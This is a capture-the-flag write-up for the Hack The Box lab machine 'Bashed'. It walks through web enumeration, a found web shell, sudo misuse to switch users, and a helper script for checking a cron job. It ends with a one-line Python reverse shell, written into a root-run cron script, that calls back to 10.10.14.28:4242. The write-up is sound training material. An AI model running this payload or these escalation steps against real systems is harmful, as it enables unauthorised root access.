Hack The Box: Bashed


Enumeration


The nmap scan reveals only one open port: 80/tcp, serving an Apache web server.

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)

Visiting the website, we see a PHP development page with some kind of blog.


The site's JavaScript references a php/sendMail POST endpoint, but we cannot see what it responds with. Next, I ran a gobuster scan against the web root and found some interesting directories:

/images               (Status: 301) [Size: 315] [--> http://10.129.29.137/images/]
/uploads              (Status: 301) [Size: 316] [--> http://10.129.29.137/uploads/]
/php                  (Status: 301) [Size: 312] [--> http://10.129.29.137/php/]
/css                  (Status: 301) [Size: 312] [--> http://10.129.29.137/css/]
/dev                  (Status: 301) [Size: 312] [--> http://10.129.29.137/dev/]
/js                   (Status: 301) [Size: 311] [--> http://10.129.29.137/js/]
/fonts                (Status: 301) [Size: 314] [--> http://10.129.29.137/fonts/]
/server-status        (Status: 403) [Size: 301]

Specifically, the /dev/ directory contains a web shell, which gives us command execution as www-data.


Initial Foothold


From there, we can grab the user flag. Next, I ran LinEnum and LinPEAS for hints on how to move on. sudo -l reveals that www-data may run any command as the user scriptmanager without a password:

www-data@bashed:/tmp$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

And here, I made some mistakes. I tried to switch to scriptmanager with su, but this does not work because su prompts for scriptmanager's password, which I don't have:

www-data@bashed:/tmp$ su scriptmanager -c bash
su scriptmanager -c bash
Password: 

However, THIS one works, because the NOPASSWD rule above is a sudo rule and says nothing about su:

www-data@bashed:/$ sudo -u scriptmanager /bin/bash
sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/$ 

This lets us enter the scripts directory, which is owned by scriptmanager. It contains a small script that is apparently executed every minute by a scheduled job: it writes a fixed string to test.txt, so the timestamp of test.txt keeps changing. Note that f.close is missing its parentheses, so the file is never explicitly closed; the write still lands because the file object is flushed and closed when the interpreter exits.

$ cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close

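Before clobbering a script like this, a practitioner would confirm two things: that the job is really live (the output file's mtime keeps changing) and that there is a privilege gap (the script is writable by the current user while its output is owned by someone else, which indicates the job runs as that other user). The helper below is an added example, not part of the original writeup; the paths /scripts/test.py and /scripts/test.txt in the usage line are assumptions about where the files live, and the polling window defaults to 70 seconds to cover a once-a-minute job.

```shell
#!/bin/sh
# Added example (not from the original writeup): confirm that a file is being
# rewritten on a schedule and record who owns the script versus its output,
# before overwriting the script. The /scripts paths used below are assumptions.

# Print "owner mode" for a path; tries GNU stat first, then BSD stat.
owner_and_mode() {
    stat -c '%U %A' "$1" 2>/dev/null || stat -f '%Su %Sp' "$1"
}

# Modification time of a path in seconds since the epoch (GNU or BSD stat).
mtime_of() {
    stat -c '%Y' "$1" 2>/dev/null || stat -f '%m' "$1"
}

# Return 0 if FILE's mtime changes within WAIT seconds (default 70, which
# covers a once-a-minute job). Polls once per second so a change is caught
# as soon as it happens rather than after the full wait.
mtime_changed() {
    file=$1
    wait=${2:-70}
    before=$(mtime_of "$file")
    i=0
    while [ "$i" -lt "$wait" ]; do
        sleep 1
        now=$(mtime_of "$file")
        [ "$now" != "$before" ] && return 0
        i=$((i + 1))
    done
    return 1
}

# Report the privilege gap between SCRIPT and its OUTPUT, then wait up to
# WAIT seconds for OUTPUT to be rewritten. Returns 0 only if the job is live.
check_cron_target() {
    script=$1
    output=$2
    wait=${3:-70}
    printf 'script: %s %s\n' "$script" "$(owner_and_mode "$script")"
    printf 'output: %s %s\n' "$output" "$(owner_and_mode "$output")"
    if [ -w "$script" ]; then
        echo "script is writable by $(id -un)"
    else
        echo "script is NOT writable by $(id -un)"
    fi
    if mtime_changed "$output" "$wait"; then
        echo "output rewritten during the wait: job is live"
        return 0
    fi
    echo "no change during the wait: job may not be running"
    return 1
}

# Usage on the box (assumed paths):
#   check_cron_target /scripts/test.py /scripts/test.txt
```

If the output file is owned by root while test.py is writable by scriptmanager, the job is almost certainly a root cron entry, and whatever replaces test.py runs with root privileges on its next tick.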
By replacing the content of test.py with a Python reverse shell, and keeping a listener waiting on 10.10.14.28 port 4242, the next scheduled run connects back and we get a root shell:

$ echo 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.28",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' > test.py